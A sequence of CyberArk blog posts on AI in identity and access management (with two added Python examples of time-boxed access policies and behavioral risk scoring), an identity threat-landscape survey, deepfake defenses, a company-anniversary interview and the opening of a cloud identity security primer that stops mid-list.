These AI functionalities are built to understand users’ individual needs and the unique circumstances of different customers, making operations more intuitive, efficient and tailored to the specific situation. Whether answering queries, suggesting next steps or executing commands on the user’s behalf, AI assistants are set to become indispensable in the IAM toolkit.

Here’s what’s likely to roll out in the next few years in this area of AI in IAM:

Predicted Release: 2024

  • Documentation chatbots will continue to evolve and improve their ability to answer generic questions based on the body of documents, knowledge base and other sources of information.
  • Assistant chatbots will understand the user’s natural language and run commands for them, but at a much deeper and more complex level than what we’ve seen thus far. For example, some user queries may involve executing a chain of API calls that requires correctly understanding the necessary parameters for each subsequent call and how to provide the appropriate response to the user. These assistants will be simple to start, but as time goes by, they will add more and more capabilities and support ever more complex use cases.

Predicted Release: 2025-2026

  • Context-aware chatbots and assistants will be more knowledgeable about individual user circumstances than their current AI predecessors. Rather than providing the same outputs to different users, these next-gen chatbots will “know” things about you and tailor their responses accordingly. For example, they will be able to identify if the user is new to the system, which operations they typically perform and which services they subscribe to. Additionally, these assistants will consider broader context, such as progress in onboarding or completing a to-do list.

Predicted Release: 2027-2030

  • Automatic issue detection and guided remediation will enable AI chatbots and assistants to become more proactive, suggesting actions and next steps. Whether it’s the next item on your to-do list or resolving an error on your screen, these assistants will increasingly offer solutions to problems and tasks – asking only for your confirmation.

2) Access Policies

The integration of AI tech is poised to significantly transform the definition of access policy. Algorithms will generate dynamic least privilege access policies, ensuring users have only the access necessary for their roles. These policies will be based on natural language and intent rather than the technical language that currently represents this intent.

This shift means that IAM administrators will transition from hands-on operators to strategic supervisors who set high-level guidelines, accept or update suggested policies and handle anomalies.

This change should accelerate task completion and reduce the technical knowledge required for policy managers within organizations. Yet, it raises an interesting question: Will this efficiency come at the expense of precision (for instance, will you get used to unquestioningly accepting the suggestions), or will it enhance security? The trend points toward the latter, considering that simpler, AI-generated policies tend to be less prone to human error and misconfiguration.

Here’s what to look for in the next few years:

Predicted Release: 2024

  • Policy recommendations based on best practices or the collective knowledge of other customers. You can expect to see lots of these soon.

Predicted Release: 2025-2026

  • Intent as policy is one of my most anticipated and revolutionary AI promises to the world of IAM (and other sister industries that handle multiple access policies). We’ll see natural language used to define new and explain existing policies. The intent will become the policy. For example, an access policy rule could look like this: “Give John SRE-level access to his team’s AWS production account for the upcoming two hours.” Or, “Don’t allow non-admin users to see payment-related fields in the CRM app.”

Predicted Release: 2027-2030

  • Automatic policy creation is the logical next step after policy recommendation. Such policies can rely on history or heuristics for their creation.
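The intents quoted above only become enforceable once they are compiled into structured policy. The following added example (not code from the original post) shows what the two sentences can compile into: a time-boxed role grant with a hard expiry and a field-level deny rule, each able to explain itself back in plain language, which is the "explain existing policies" direction as well as the "define new" one. The parsing step from sentence to structure is omitted; the principal name, account identifier, application name and field names are assumptions.

```python
"""Two 'intent as policy' rules as enforceable objects.

Added example, not code from the original post. The two natural-language
intents quoted in the text are modelled as the structured policy an engine
would actually execute: a time-boxed role grant and a field-level deny
rule, each able to explain itself back in plain language. Turning the
sentence into this structure (the language-model step) is out of scope;
the principal names, scope identifiers and field names are constructed
assumptions for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class TimeBoxedGrant:
    """'Give <principal> <role> access to <scope> for the upcoming <n> hours.'"""
    principal: str
    role: str
    scope: str            # e.g. an AWS account identifier
    not_before: datetime  # timezone-aware
    not_after: datetime   # exclusive: the grant is void at this instant

    def permits(self, principal, role, scope, now):
        return (principal == self.principal and role == self.role
                and scope == self.scope
                and self.not_before <= now < self.not_after)

    def describe(self):
        return (f"Give {self.principal} {self.role} access to {self.scope} "
                f"from {self.not_before.isoformat()} until {self.not_after.isoformat()}.")


@dataclass(frozen=True)
class FieldDenyRule:
    """'Don't allow non-<unless_role> users to see <field_prefix>* fields in <app>.'"""
    app: str
    field_prefix: str
    unless_role: str

    def redact(self, app, record, roles):
        """Return a copy of record with denied fields removed for this caller."""
        if app != self.app or self.unless_role in roles:
            return dict(record)
        return {k: v for k, v in record.items() if not k.startswith(self.field_prefix)}

    def describe(self):
        return (f"Don't allow non-{self.unless_role} users to see "
                f"{self.field_prefix}* fields in the {self.app} app.")


def grant_from_intent(principal, role, scope, hours, now):
    """Compile a duration-based intent into a grant with an explicit expiry."""
    return TimeBoxedGrant(principal, role, scope, now, now + timedelta(hours=hours))


# Constructed sample: the two intents from the text.
NOW = datetime(2024, 5, 21, 12, 0, tzinfo=timezone.utc)
JOHN_SRE = grant_from_intent("john", "sre", "aws:123456789012", 2, NOW)
CRM_PAYMENT_RULE = FieldDenyRule(app="crm", field_prefix="payment_", unless_role="admin")
SAMPLE_RECORD = {"account": "Acme Corp", "payment_card_last4": "4242", "payment_terms": "net30"}


def demo():
    """Exercise both rules; returns the observations a test can check."""
    one_hour, two_hours = NOW + timedelta(hours=1), NOW + timedelta(hours=2)
    return {
        "in_window": JOHN_SRE.permits("john", "sre", "aws:123456789012", one_hour),
        "at_expiry": JOHN_SRE.permits("john", "sre", "aws:123456789012", two_hours),
        "wrong_account": JOHN_SRE.permits("john", "sre", "aws:999999999999", one_hour),
        "rep_view": CRM_PAYMENT_RULE.redact("crm", SAMPLE_RECORD, {"sales-rep"}),
        "admin_view": CRM_PAYMENT_RULE.redact("crm", SAMPLE_RECORD, {"admin"}),
    }


if __name__ == "__main__":
    print(JOHN_SRE.describe())
    print(CRM_PAYMENT_RULE.describe())
    for name, value in demo().items():
        print(name, value)
```

Two design points carry over to any real engine: the grant window is half-open so access ends exactly at the stated hour rather than one evaluation later, and the deny rule filters by field prefix rather than by an allow-list, so a newly added payment field is hidden by default instead of leaking until someone updates the policy.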

3) Risk-based Access

The third pillar focuses on the nature of access itself. As AI makes access to systems more personalized and contextualized, access becomes more dynamic and transparent. This means fewer repetitive logins and multi-factor authentication (MFA) prompts during normal operations, leading to smoother workflows and less user frustration.

Here’s what I predict we’ll see in this area in the near and not-as-near future:

Predicted Release: 2024

  • Activity summaries and security insights will be generated from the user’s interactions with systems, which produce a digital trace (like a video recording, a log or an audit record). Generative AI (GenAI) will transcribe and summarize this trace into human-readable text. Additionally, GenAI will alert you if you perform a risky operation during the session.

Predicted Release: 2025-2026

  • Behavioral profiling and threat detection will work together to create and continually update risk profiles for workloads and users. These profiles will be based on their activity within the systems, allowing for the creation of specific profiles for each workload and user. As a result, more granular and precise risk-level management and threat detection will be achievable.

Predicted Release: 2027-2030

  • Automated threat prevention will be the next natural step following the arrival of threat detection mechanisms. It will likely take many forms, such as stopping a suspicious session, suspending a questionable user or requiring additional login measures from them.
  • Automatic policy creation (extension): With the ability to maintain user-specific profiles, systems will use this data to create user-specific and context-specific behavior, resulting in more personalized and dynamic access policies.
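Behavioral profiling, in-session alerting on risky operations and activity summaries can be sketched without any GenAI at all. The added example below (not code from the original post) builds a per-user baseline of typical actions from constructed audit records, scores new sessions against that baseline and against a fixed list of risky operations, maps the score to allow, step-up or terminate, and produces a plain-text summary of each session trace. Action names, weights and thresholds are assumptions.

```python
"""Behavioral baseline, in-session risk flags and an activity summary.

Added example, not code from the original post. A per-user baseline of
typical actions is built from historical audit records; a new session is
then scored for actions the user has never performed, for operations that
are risky regardless of history, and for the absence of any history at
all. The same trace is also condensed into a plain-text activity summary,
a deterministic counterpart of the GenAI summarization the text describes.
All records, action names, weights and thresholds are constructed
assumptions for illustration.
"""
from collections import Counter, defaultdict

# Constructed historical audit records: (user, action).
HISTORY = [
    ("alice", "s3:GetObject"), ("alice", "s3:GetObject"), ("alice", "s3:GetObject"),
    ("alice", "s3:ListBucket"), ("alice", "s3:ListBucket"),
    ("alice", "ec2:DescribeInstances"),
    ("bob", "ec2:DescribeInstances"), ("bob", "ec2:StartInstances"),
]

# Operations treated as risky no matter who performs them (assumed list).
RISKY_ACTIONS = {
    "iam:CreateAccessKey",
    "iam:AttachUserPolicy",
    "s3:DeleteBucket",
    "ec2:AuthorizeSecurityGroupIngress",
}

NO_HISTORY_WEIGHT = 30
NOVEL_ACTION_WEIGHT = 10
RISKY_ACTION_WEIGHT = 25
STEP_UP_THRESHOLD = 30
TERMINATE_THRESHOLD = 60


def build_baselines(records):
    """Map each user to a Counter of the actions they have performed before."""
    baselines = defaultdict(Counter)
    for user, action in records:
        baselines[user][action] += 1
    return dict(baselines)


def summarize(user, actions):
    """Condense a session trace into one human-readable line."""
    counts = Counter(actions)
    parts = ", ".join(f"{n}x {a}" for a, n in sorted(counts.items()))
    return f"{user} performed {len(actions)} actions: {parts}"


def score_session(user, actions, baselines):
    """Return score, verdict, findings and summary for one session."""
    score, findings = 0, []
    base = baselines.get(user)
    if base is None:
        score += NO_HISTORY_WEIGHT
        findings.append("no historical activity for this identity")
    else:
        novel = sorted({a for a in actions if a not in base})
        if novel:
            score += NOVEL_ACTION_WEIGHT * len(novel)
            findings.append("never-before-seen actions: " + ", ".join(novel))
    risky = sorted({a for a in actions if a in RISKY_ACTIONS})
    if risky:
        score += RISKY_ACTION_WEIGHT * len(risky)
        findings.append("risky operations: " + ", ".join(risky))
    if score >= TERMINATE_THRESHOLD:
        verdict = "terminate"
    elif score >= STEP_UP_THRESHOLD:
        verdict = "step_up"
    else:
        verdict = "allow"
    return {"user": user, "score": score, "verdict": verdict,
            "findings": findings, "summary": summarize(user, actions)}


BASELINES = build_baselines(HISTORY)

# Constructed sessions to score.
SESSIONS = {
    "alice_routine": ("alice", ["s3:GetObject", "s3:ListBucket"]),
    "alice_escalation": ("alice", ["s3:GetObject", "iam:CreateAccessKey", "iam:AttachUserPolicy"]),
    "bob_firewall": ("bob", ["ec2:DescribeInstances", "ec2:AuthorizeSecurityGroupIngress"]),
    "carol_unknown": ("carol", ["s3:GetObject"]),
}


def verdict_for(name):
    user, actions = SESSIONS[name]
    return score_session(user, actions, BASELINES)


if __name__ == "__main__":
    for name in SESSIONS:
        result = verdict_for(name)
        print(f"{name}: score={result['score']} verdict={result['verdict']}")
        print("  " + result["summary"])
        for finding in result["findings"]:
            print("  - " + finding)
```

The risky-operation list is deliberately independent of the baseline: an administrator who creates access keys every day still gets flagged, because the point of that list is to surface high-impact actions for review rather than to learn that they are normal for someone.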

The Impact of AI on IAM: A Look Into the Future

Integrating AI in IAM is an ongoing journey toward creating more secure, efficient and user-friendly systems. As we look to the future, the focus will be on how AI can seamlessly integrate into the core areas of IAM to provide increased security and productivity.

At CyberArk’s AI CoE, our mission is to drive state-of-the-art technological innovation in our products and create value for our customers by meeting today’s challenges and future-proofing against tomorrow’s cyberthreats. We strive to seamlessly integrate AI into the core areas of IAM, enhancing security and productivity. As we continue exploring the exciting possibilities, we are grateful for our customers and partners in this journey toward a more secure and efficient future.

Together, we can achieve great things.

Daniel Schwartzer is CyberArk’s Chief Product Technologist and the leader of CyberArk’s Artificial Intelligence Center of Excellence.

*Learn more about CyberArk CORA AI.

Editor’s note: For more insights from Daniel Schwartzer on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “AI Insights: Shaping the Future of IAM.” The episode is available on most major podcast platforms.

The Growing Threat of Identity-Related Cyberattacks: Insights Into the Threat Landscape
https://www.cyberark.com/blog/the-growing-threat-of-identity-related-cyberattacks-insights-into-the-threat-landscape/
Thu, 16 May 2024 17:33:48 +0000

The last 12 months have witnessed a rapid-fire round of innovation and adoption of new technologies. Powerful new identities, environments and attack methods are shaping the quickly changing cybersecurity threat landscape, rendering it more complex and diffusing the focus of risk reduction efforts. New CyberArk research indicates that the rise of machine identities and the increasing reliance on third- and fourth-party providers are deepening the existing threats and creating novel vulnerabilities.

The CyberArk 2024 Identity Security Threat Landscape Report, released today, surveyed 2,400 identity-related cybersecurity experts and decision-makers across 18 countries to provide deep insights into the evolving threat landscape. The report reveals that an overwhelming majority (93%) of organizations have experienced two or more breaches due to identity-related cyberattacks. These organizations anticipate that the total number of identities will increase more than 2.4 times in the next 12 months.

Several factors contribute to this surge in identity-related attacks, including the rise in volume and sophistication of cyberattacks perpetrated by both skilled and unskilled bad actors who utilize generative AI (GenAI) to amplify their attacks. These threat actors target an already intricate and expanding digital ecosystem, exploiting unsecured identities to gain access to their victims’ environments. To that end, the report finds that nearly all (99%) organizations affected by identity-related attacks suffer negative business impacts.

Read on to get a look at some key trends outlined in the report.

The Perils of GenAI

GenAI is, of course, not new to organizations or bad actors. In fact, 99% of organizations use AI-powered tools in their cybersecurity initiatives, while bad actors also use GenAI to increase the volume and sophistication of their attacks. As a result, 93% of organizations anticipate a negative impact from AI, expecting an increase in AI-augmented malware, phishing and data breaches. In the last 12 months, nine out of 10 organizations experienced a breach due to phishing or vishing attacks. With AI-powered cyberattacks becoming more challenging to detect, the likelihood of widespread organizational breaches increases.

Deepfake videos and audio generated by GenAI are becoming increasingly difficult to discern. Yet, in the B2B world, over 70% of respondents are confident that their employees can identify deepfake content featuring their organizations’ leaders. These insights suggest complacency among respondents, likely fueled by an illusion of control, planning fallacy – or just plain human optimism. The full extent of the potential damage that GenAI-augmented attacks can inflict and the damage multiplier of compromising the data models feeding defensive GenAI remains unknown, and our vulnerability to it may be greater than we realize. These responses underscore the need to plan for more advanced future attacks and invest in protecting the data models used by machine intelligence and extending strong governance to this new AI identity.

New Era: Rise of the Machines

Nearly half of the 2,400 surveyed cybersecurity experts anticipate a threefold increase in machine identities, which are primarily under-secured and over-privileged. Ongoing automation efforts at scale and pervasive cloud computing further exacerbate the proliferation of vulnerable machine identities. The increase in the total number of these identities is neither new nor surprising. However, what is surprising (and concerning) is that a majority (61%) of surveyed organizations have an exceedingly narrow definition of “privileged user,” one that applies solely to human identities with access to sensitive data.

This definition contradicts our respondents’ own observations: more than two-thirds (68%) indicate that up to 50% of all machine identities have access to sensitive data.

Their organizations’ definition of a “privileged user” therefore reveals a massive gap: it excludes machine identities. Organizations report that they are focused primarily on securing human identities, which leaves machine identities comparatively under-protected. They also report that a security incident requires significant manual effort to address or remediate.

Chain Reaction: Third and Fourth-party Risks

The report also highlights a lack of rigorous focus on vendor risk management despite the expanding web of our digital ecosystems. In the next 12 months, 84% of organizations plan to employ three or more cloud service providers (CSPs), and projections show an 89% annual increase in the number of SaaS applications, compared to 67% in 2023.

It’s crucial to understand that your network of third-party providers extends beyond CSPs and SaaS providers to include service providers, integrators, hardware and infrastructure suppliers, business partners, distributors, resellers, telecommunications and other external entities that enable digital business. Third- and fourth-party breaches can quickly cascade to your organization, creating a multiplier effect on risk.

The report finds that while 91% of respondents are concerned about third-party risks and 83% about fourth-party risks, vendor risk management remains a low priority for post-breach investments. It’s important to note that bad actors often employ a ‘buy one, get one’ approach, targeting multiple victims through software supply chain attacks and attacks on multi-tenant environments. This means if bad actors target your third- or fourth-party providers, they could put your organization at risk. As such, regular vendor risk assessments and heightened vendor accountability are crucial. Likewise, this vendor accountability and risk assessment strategy should extend to cybersecurity vendors, too.

Cyber Debt: ‘Shiny Object’ Syndrome and a Blind Spot

Facing growing threats, organizations may prioritize adopting the latest technologies over foundational controls to address cybersecurity challenges. However, this can lead to the accumulation of cyber debt, where organizations incur significant costs and risks by neglecting existing vulnerabilities. This shift in behavior, and the poor results it produces, shows the need for consistent controls and tooling across both foundational and new attack paths. According to the report, core social engineering attacks like phishing and vishing remain highly effective, resulting in breaches and substantial financial losses for nine out of 10 organizations.

Organizations must balance addressing existing vulnerabilities and adopting new technologies. Despite the complexity and challenges inherent in the future of cybersecurity, organizations can mitigate risks by staying informed and adopting a proactive approach to risk management that is consistent across all identities and environments.

Identity Security: The Key to a Robust Cybersecurity Posture

In today’s fast-paced world, where challenges abound, every defense erected becomes a new tower that bad actors seek to conquer. Our most significant advantage against these threats lies in our ability to collaborate. As Michael Jordan famously said (I’m told…), “Talent wins games, but teamwork and intelligence win championships.” Our collective defense extends beyond immediate colleagues to encompass our entire organization and third- and fourth-party providers. Securing every identity across the IT environment is paramount, necessitating a new cybersecurity model centered on identity security. The future of security starts with identity.

Download the CyberArk 2024 Identity Security Threat Landscape Report for comprehensive insights into navigating the evolving cybersecurity landscape.

Brandon Traffanstedt is a senior director in CyberArk’s Field Technology Office.

CIO POV: Navigating the Deepfake Pandemic with Proactive Measures https://www.cyberark.com/blog/cio-pov-navigating-the-deepfake-pandemic-with-proactive-measures/ Tue, 14 May 2024 18:07:59 +0000

We’re in the throes of another pandemic, but this time, it’s not transmitted through the air – it spreads with just a click.

Welcome to the world of deepfakes.

While COVID-19 significantly impacted our physical and mental well-being, deepfakes affect our minds differently. Their influence is causing confusion, mistrust and a distorted perception of reality, both personally and globally. In this crucial election year – with over 4 billion people across 60 countries gearing up to choose their leaders – deepfake technology is being weaponized to spread misinformation, influence global events and shape the course of history.

Voter influence campaigns fueled by deepfake videos will spread across social media platforms with a mere click. In the midst of elections now, India is grappling with an onslaught of deepfakes. Moreover, deepfakes are infiltrating B2B environments, exemplified by a recent fraud case in Hong Kong that incurred significant financial losses for a financial firm.

Further chaos will ensue as GenAI races toward super-fakes.

Mitigating the Risks of GenAI

Ongoing innovation in GenAI will likely render the average person incapable of discerning authentic content from deepfakes. Currently, there are no tools capable of identifying and mitigating this threat. This gap will put added pressure on cybersecurity teams already pressed with limited resources and budgets to defend against the existing threat landscape. However, here are three measures we must consider now to address this modern risk:

   1. Establishing Regulations Quickly

Regulations, though not foolproof, serve as guardrails against unchecked technological innovation. The absence of regulations, as witnessed in the case of social media, allows for rampant issues like misinformation and polarization. Governments worldwide, mindful of not making the same mistakes they made with social media, are swiftly enacting regulations to hold both vendors and users of GenAI accountable. Examples from 2023 include the EU AI Act and the U.S. Executive Order (EO) on the Safe, Secure and Trustworthy Development and Use of Artificial Intelligence.

The current regulations are – to some extent – slowing down the pace at which vendors release GenAI-powered tools to the market. For example, OpenAI is delaying the release of Sora AI to ensure content provenance and enable users to identify real vs. increasingly real-looking but fake videos.

   2. Addressing Misplaced Confidence and the Need for Self-Regulation

AI-driven phishing and deepfake scams are already working. In February, a Hong Kong-based multinational company lost HK $200 million (U.S. $25.6 million) to a deepfake scam that fooled a clerk into executing a financial transaction discussed during a virtual meeting where every attendee – even the chief financial officer (CFO) – was fake. Unfortunately, this first-of-its-kind AI heist (and worst day ever for the clerk) will not be the last. AI-powered phishing attacks will soon target and potentially breach nearly all organizations. On top of this dire forecast, our Identity Security Threat Landscape Report also projects a steep rise in GenAI-powered phishing that will be harder to detect because of the sophistication and scale of the attacks.

Yet despite the growing threat of AI-driven phishing and deepfake scams, there’s a widespread misconception among employees regarding their ability to identify deepfakes. Our recent survey of 4,000 U.S. office workers finds that over 70% of employees (yes, you read that correctly) are largely confident in their ability to identify a deepfake video or audio of the leaders in their organization.

It’s a bad bet. This misplaced confidence underscores the need for rigorous fact-checking and self-regulation. Individuals must verify information from multiple trusted sources and exercise caution, particularly in high-stakes scenarios. And if you can’t fact-check it with numerous trusted sources, don’t believe it.

   3. Tackling the Debilitating Lack of Tools

Among other notable executives to make bullish statements about AI, JP Morgan Chase CEO Jamie Dimon recently said that AI could be as impactful as electricity. And who can fault them for making such statements? After all, GenAI boasts over a billion users in just a matter of months. No other technology has seen such unprecedented adoption.

I’m excited about AI, too.

However, the unchecked proliferation of GenAI poses significant challenges for organizations, including the need for more effective training and oversight. GenAI tools learn from vast datasets, raising concerns about inadvertently sharing sensitive data. Moreover, some GenAI models inherently lack adequate cybersecurity safeguards – controls too complicated to configure – leaving organizations vulnerable to exploitation by malicious actors. It’s particularly concerning that the number of GenAI tools that can generate deepfakes is increasing, but tools that can detect and prevent them are too few or next to non-existent.

As a leader, I sympathize with my peers facing the same ordeal who still must find ways to maintain a robust security posture.

What Your Organization Can Do to Protect Against Deepfakes

The good news is that there are some things organizations can do now to protect against deepfakes. These actions include:

  • Identify and train external-facing employees who interact with customers and may have access to sensitive information. For example, support and services staff should be trained to ask additional questions to verify whether the external caller is a human or a deepfake.
  • Educate all employees on the risks of engaging with unverified content and discourage amending or amplifying such content.
  • Prioritize investment in responsible and ethical AI practices, particularly during times of budget cuts.
  • Hold AI vendors accountable by embedding language in contracts to review capabilities periodically and ensure alignment with expectations.
  • Foster collaboration between employees and leadership to address gaps in perception and enhance awareness of deepfake threats. You can start by socializing and discussing our Identity Security Threat Landscape Report findings with them (my gift to you!).

As we navigate the uncharted territory of GenAI, collaboration, vigilance and proactive measures are essential to combat the threat of deepfakes. Let’s work together to ensure that GenAI shapes a future where technology is a force for good rather than a pervasive pandemic of misinformation.

Don’t wait – take action now to protect your organization from the dangers of deepfakes.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

CyberArk at 25: Udi Mokady on Milestones, Identity Security and Humility https://www.cyberark.com/blog/cyberark-at-25-udi-mokady-on-milestones-identity-security-and-humility/ Fri, 10 May 2024 13:32:11 +0000

Let’s head back for a moment to when some of us were partying like it’s 1999, in 1999. Among that year’s notable milestones were the release of The Matrix, the introduction of the euro – and the impending clock turn to 2000 (aka Y2K), which propelled prophylactic tech upgrades far and wide. Simpler times – at least in retrospect.

Somewhere amid the Czech Republic, Hungary and Poland joining NATO and “Hotmail hacking,” the company that now underwrites this blog debuted in the spring of 1999. CyberArk launched in a small sublet office outside Tel Aviv with a digital vault solution and a handful of employees. Soon after that came U.S. expansion and a rising focus, born from customer need, on securing privileged access – initially for IT admins.

CyberArk would soon become instrumental in pioneering the privileged access management (PAM) market and continuously driving its evolution. With the advent of multi-cloud, hybrid working and the dissolving of the security perimeter that followed, what began with IT admins expanded to the wider workforce and all other human identities, as well as bots and applications – all with degrees of sensitive access that need to be managed, monitored and controlled. Privileged credentials are everywhere around us, and attackers, of course, still relentlessly attempt to compromise privileged credentials and use them to move laterally throughout networks to reach intended targets.

Then identity security entered the fold – centered on PAM – making it easier for organizations to protect themselves against advanced cyber threats by securing all human and non-human identities, accessing all resources from every location. CyberArk established the category, and identity security has quickly become essential to extensive digital initiatives that drive businesses forward.

Critical to the company’s rise, continuous innovation and business transformation is co-founder Udi Mokady. Propelled in large part by his vision, under Mokady’s leadership, CyberArk has grown to over 3,000 employees and offices in 16 countries. And it was just last year when he shifted to a new executive chairman role after serving as the company’s CEO for over 18 years, including the first eight-plus years since he took the company public in 2014.

To commemorate CyberArk’s 25th anniversary, Mokady recently sat down with me for an episode of our Trust Issues podcast. It’s a wide-ranging discussion that looks back, looks forward and dips into philosophies and lessons learned. In the episode, Mokady reflects on the significance of CyberArk’s quarter-century milestone, its ongoing growth and innovation’s pivotal and enduring role in that growth. He also talks about the ever-evolving threat landscape and how the company has, in turn, grown and scaled to meet it while maintaining its culture and values.

The following excerpts from the podcast have been edited and condensed for clarity.


On CyberArk’s early days: “There’s no way in the world that I envisioned getting to where we are today. This would have been a crazy dream at the time when we were in a sublet in Israel.”

On the 2014 IPO: “Going public created a platform we could ride on to build a long-lasting company … It was a way to show our customers and partners that we were going to be around for the long haul. It was a way to earn the right to say that we were built to last … Everything we did was about thinking long-term and doing what was best for the company in the long-term. Going public was good for business and it was good for our brand.”

On the transition from CEO to Executive Chairman: “It’s been a wild year. I’d been CEO of CyberArk for more than 18 years until we decided to do this transition. I turned it over to Matt Cohen, who is a superb CEO, so that I can focus on things that are strategic to CyberArk. It’s been a great transition, and I think we’re writing a case study of a founder/CEO transitioning to another CEO while the founder stays connected to the company, customers, partners, culture and employees.”

On endurance: “You can’t be built to last in cybersecurity without making innovation a major pillar and a major part of your strategy. It’s all about continuously extending our solutions to address modern-day attacks, both organically and inorganically, through partnering and acquisitions. We’re very unique in how much we partner in the C3 Alliance, which has thousands of integrations with third parties. That approach of security as a team sport is another thread of innovation … And part of our culture is to think like an attacker, so every team member at CyberArk approaches their role by bringing the attacker into the room in everything we do. That really drives our innovation – we’re not developing in a silo – we’re thinking about defending against that attacker.”

On culture: “Company culture is the most important aspect of a successful business. At CyberArk, we have a unique culture that’s built on the values of being smart, bold, but humble. These values are ingrained in our DNA and are reflected in everything we do. We hire and retain people who possess these traits, and it has been a key factor in our success. Our culture is global, and we have a reputation for having amazing people. I am most proud of our people and the culture we have built.”

On humility: “You can’t train humble. It’s very much how people grew up. It’s people who influenced them in their life. It could be their parents, a mentor, their friends, or something that they were part of. When you’re humble, it means you’re not full of yourself. It means you’re going to listen.”

On perseverance amid geopolitical tensions: “I am very proud of the resilience of the team in Israel … Something happened where people huddled and covered for each other. Like, if somebody was out in reserve duty, people covered for one another. And the output in R&D and delivery and support – everything – was greater than 100 percent.”

On aspirations: “My ultimate dream for CyberArk is for it to continue to grow and scale, while maintaining its culture and values. I want the company to be a trusted and reliable partner for its customers and to continue to innovate and address the evolving threat landscape. Personally, I hope to remain energetic, curious and always learning. Always be learning.”

On identity security: “What I’ve learned is that the rise and importance of identity security is paramount in today’s digital age. With the proliferation of identities, both human and machine, the need to secure them has never been greater. The threat landscape has evolved rapidly, and attackers are becoming increasingly sophisticated in their methods. Identity security is no longer a luxury, but a necessity. It’s the key to protecting against privilege escalation, credential theft and other forms of cyberattacks. It’s a critical layer of defense that every organization must have in place to protect their most valuable assets.”

On 25 years of attacker innovation: “Some things that have evolved in the attacker landscape are the makings of science fiction movies … Who would’ve imagined that there was going to be the ability for criminals to encrypt organizations and the extortion is not going to be in cash that they have to deliver in a suitcase? Instead, you can deliver a Bitcoin, and it’s going to be untraceable and they’re going to be sitting in their air-conditioned rooms getting a massage while the Bitcoin is coming in. No one would have imagined.”

On extracurricular pursuits: “Outside of work, I have a love for music and playing the guitar. I’ve been studying some riffs, like the ‘Comfortably Numb’ solo from ‘The Wall’ that David Gilmour plays so well – but I’m not ready for live-streaming yet. I’m also passionate about how we educate the younger generation to read real news sources and not get their news from TikTok – and reducing hate around the world. I want to stay closely in touch with innovation, and I’m able to contribute more to the ecosystem by mentoring startups – some in cybersecurity, but some not – because I think it’s beneficial to CyberArk and our customers that I get exposed to other things.”

You can listen to the entire Trust Issues podcast interview with CyberArk Founder and Executive Chairman Udi Mokady in the player below or on most major podcast platforms.

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

The Anatomy of Cloud Identity Security https://www.cyberark.com/blog/the-anatomy-of-cloud-identity-security/ Wed, 08 May 2024 19:13:38 +0000

There’s currently a cybersecurity adage with varying verbiage and claimed origins – the point, however, is unmistakable:

Attackers don’t break in. They log in.

This saying underscores the strategic shift associated with cloud adoption’s prominence in shaping the digital landscape. New environments have created new attack methods to gain access by logging in rather than infiltrating a perimeter. As technologies continue to advance, we cannot expect previous security methods to tackle these new challenges.

Before cloud environments, attackers had to break into on-premises infrastructures with a protected perimeter. Networks, servers, hardware and software were all safely within this perimeter, monitored and managed by IT. Now, organizations are effectively demolishing it. They are utilizing cloud technology and storing data on several different clouds.

Once attackers gain entry to these multi-cloud estates, any movement can mean organizational destruction. Keeping the cloud secure is vital to an organization’s business success.

But what exactly does it mean to secure the cloud? Let’s first rewind to equip ourselves collectively with the basics of cloud identity security.

Defining Cloud Environments and Deployment Types

The cloud comprises internet-based computing services for storage, processing and software access.

Though it sounds simple enough, when tasked with protecting “the cloud,” this answer becomes somewhat more complex. Your mission also includes protecting the various forms of cloud deployment models. Responsibilities are often unclear, but your organization is always responsible for your data, regardless of your cloud type.

Cloud environments have four different cloud deployment models, each with unique benefits and security risks. These models are:

  1. Public Cloud: The Open Playground on the Internet
    Think of the public cloud as a vast, shared playground accessible to anyone with an internet connection. Third-party vendors, such as Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP), provide cloud services in this model.
  2. Private Cloud: The On-premises Infrastructure
    Unlike the public cloud, the private cloud is like having your own exclusive club – an infrastructure dedicated solely to your organization. In this model, cloud resources are provisioned and managed within a private network, offering enhanced security, control and customization. A private cloud also increases management responsibility.
  3. Hybrid Cloud: Not Fully Committed to the Public, But Also Not Fully On-premises
    As the name suggests, the hybrid cloud combines on-premises infrastructure and cloud services, interconnected to create a unified environment. This model allows organizations to leverage the scalability and flexibility of the public cloud while maintaining control over sensitive data and applications in the private cloud. But, a hybrid cloud also increases technical complexity.
  4. Multi-cloud: Everything, Everywhere, All at Once
    In the multi-cloud model, organizations harness the power of multiple cloud providers. All hybrid clouds are multi-clouds – but not all multi-clouds are hybrid clouds. By spreading workloads across multiple clouds, organizations can mitigate risks, avoid vendor lock-in and optimize performance and cost.

Understanding Cloud Services and Resources

Now that we’ve covered cloud deployment models let’s get closer to learning how to secure the cloud by first discussing what needs to be secured.

All cloud environments contain two elements:

  1. Management platform and services
    Management consoles (accessed via the web UI, CLI or API) are the main access points into the cloud. Cloud management platforms (CMPs) are your organization’s tools to monitor and control your cloud environments. Capabilities and integrations can vary widely across vendors, but your organization will require some form of CMP, depending on the type of cloud model. All the resources in the cloud are called cloud services.
  2. Infrastructure workloads
    The second element is infrastructure workloads. Cloud resources, including virtual machines, containers, serverless functions, cloud-native apps and storage created by different cloud services, can run specific apps, services and workloads.

There are services to administer and create these various workloads, but what’s unique about these resources is that they, too, require a separate layer of identity security controls, separate from that of the platform or services.

The Shared Responsibility Model

To comprehensively grasp cloud services and resources, it’s crucial to delineate the respective responsibilities of organizations and cloud service providers (CSPs). Enter the shared responsibility model, which was created for exactly this reason. It is how CSPs communicate who is responsible for the management and security of each service. Some things are their problem, and some things are yours.

You will always be responsible for who can access the management console, cloud services and infrastructure workloads, which is where cloud identities come in.

Exploring Cloud Identity Types

Identities refer to who can access what in the cloud. Each type of identity has different access needs, which means each identity poses a different level of risk to your organization.

The four different types of identities that need to be secured are:

  1. Cloud Operations Identities
    Having evolved from traditional IT roles such as infrastructure operations, networking engineers or database admins, cloud operations identities are roles like cloud operators, architects and site reliability engineers. Within cloud operations, full cloud administrators have complete administrative access and the ultimate permission to affect every service and resource within the CSP account. There are also service-level admin roles, like engineers with specializations in networking or databases, that can only administer a smaller scope of services and resources.
  2. Developer Identities
